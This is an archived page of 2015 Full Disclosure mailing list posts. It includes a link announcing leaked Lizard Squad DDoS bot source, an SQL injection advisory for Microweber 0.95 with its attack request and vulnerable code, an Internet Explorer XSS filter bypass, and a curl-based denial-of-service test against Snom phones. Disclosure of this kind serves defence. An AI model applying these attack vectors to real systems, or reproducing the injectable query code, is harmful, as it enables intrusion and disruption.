Web Archives  RSS: http://seclists.org/fulldisclosure/


Re: [FD] Lizard Stresser rekt

2015-01-12 Thread Julius Kivimäki
ayy lmao

//Julius Kivimäki, leader of Lizard Squad

2015-01-12 10:29 GMT+00:00 Robert Cavanaugh sleuth1...@gmail.com:

 Hi FD,

 I'm sure you're all sick to death of hearing about Lizard Squad and the
 skid marks they're leaving all over the place, so we'll make this brief:
 Lizard Squad has been rekt and the source code for their bots is now
 available for your viewing pleasure.

 https://github.com/pop-pop-ret/lizkebab

 0wned by: Chippy1337, @packetprophet

 If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
 https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4

 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection Vulnerability in Microweber 0.95

2015-01-12 Thread ITAS Team
# Exploit Title:   SQL Injection Vulnerability in Microweber 0.95

# Vendor:   https://microweber.com/

# Download link:  https://microweber.com/download
(https://github.com/microweber/microweber)

# CVE ID:  CVE-2014-9464

# Vulnerability: SQL Injection

# Affected version: Version 0.95 before 12/09/2014.

# Fixed version:Version 0.95 updated on 12/11/2014

# Author: Pham Kien Cuong (cuong.k.p...@itas.vn)  ITAS
Team (www.itas.vn)

 

::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed within the
Microweber CMS as an anonymous user. A successful attack could allow an
anonymous attacker to access information such as username and password
hashes, or other private information  that are stored in the database. The
following URL and parameter have been confirmed to suffer from SQL
injection.

 

- Attack vector: 

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1

Host: target.org

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://target/shop

Cookie: mw-time546209978=2015-01-05+05%3A19%3A53;
PHPSESSID=48500cad98b9fa857b9d82216afe0275

Connection: keep-alive

 

- Vulnerable file:   microweber-master/src/Microweber/Category.php

- Vulnerable function:   get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

- Vulnerable parameter:  $parent_id

- Vulnerable code: 

public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

{

 

$categories_id = intval($parent_id);

$cache_group = 'categories/' . $categories_id;

 

$table = $this-tables['categories'];

 

$db_t_content = $this-tables['content'];

 

if (isset($orderby) == false) {

$orderby = array();

//$orderby[0] = 'updated_on';

 

//$orderby[1] = 'DESC';

 

$orderby[0] = 'position';

 

$orderby[1] = 'asc';

}

 

if (intval($parent_id) == 0) {

 

return false;

}

 

$data = array();

 

$data['parent_id'] = $parent_id;

 

if ($type != FALSE) {

$data['data_type'] = $type;

} else {

$type = 'category_item';

$data['data_type'] = $type;

}

 

$cache_group = 'categories/' . $parent_id;

$q =  SELECT id,  parent_id FROM $table WHERE parent_id=$parent_id
;

$q_cache_id = __FUNCTION__ . crc32($q);

$save = $this-app-db-query($q, $q_cache_id, $cache_group);

if (empty($save)) {

return false;

}

$to_return = array();

if (is_array($save) and !empty($save)) {

foreach ($save as $item) {

$to_return[] = $item['id'];

}

}

 

$to_return = array_unique($to_return);

 

return $to_return;

}  

 

- Fix code: 

public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

{

$categories_id = $parent_id =intval($parent_id);

$cache_group = 'categories/' . $categories_id;

$table = $this-tables['categories'];

$db_t_content = $this-tables['content'];

if (isset($orderby) == false) {

$orderby = array();

//$orderby[0] = 'updated_on';

//$orderby[1] = 'DESC';

$orderby[0] = 'position';

$orderby[1] = 'asc';

}

if (intval($parent_id) == 0) {

return false;

}

$data = array();

$data['parent_id'] = $parent_id;

if ($type != FALSE) {

$data['data_type'] = $type;

} else {

$type = 'category_item';

$data['data_type'] = $type;

}

$cache_group = 'categories/' . $parent_id;

$q =  SELECT id, parent_id FROM $table WHERE
parent_id=$parent_id ;

$q_cache_id = __FUNCTION__ . crc32($q);

$save = $this-app-db-query($q, $q_cache_id,
$cache_group);

if (empty($save)) {

return false;

}

$to_return = array();

if (is_array($save) and !empty($save)) {

foreach ($save as $item) {

$to_return[] = $item['id'];

}

}

$to_return = array_unique($to_return);

return $to_return;

}

 

 

::SOLUTION::

Version 0.95 updated on 12/11/2014

 

::TIMELINE::

 

[FD] MS14-080 CVE-2014-6365 Technical Details Without Nonsense

2015-01-12 Thread Diéyǔ

Origin:
Visit https://technet.microsoft.com/library/security/ms14-080
Go to Acknowledgments part and search for CVE-2014-6365
It says Dieyu - that's me.

Technical Details:
Internet Explorer XSS Filter Bypass Vulnerability is done by...
1. Inject a href link into target page.
(Not script, allowed by filter)
2. User clicks this injected link.
(Clickjacking etc)
3. URL of this injected link puts script into page.
(Filter does not kill it)
(Because it's transaction of the same domain)

Social Activities:
1. Greetings
David Ross dross.
2. Hey, if you love my hacking, please reply nice.
(I do this for free. Love to hear from my readers.)
3. My LinkedIn page: https://www.linkedin.com/in/liuzhiyong
(You can add me there! Recently I took a new name.)
4. My ultimate flaw: http://dieyu.org/
(You know my style. Comment is welcome!)

Regards,

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread Martin Schuhmacher
Hi

i just did 

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

did i miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/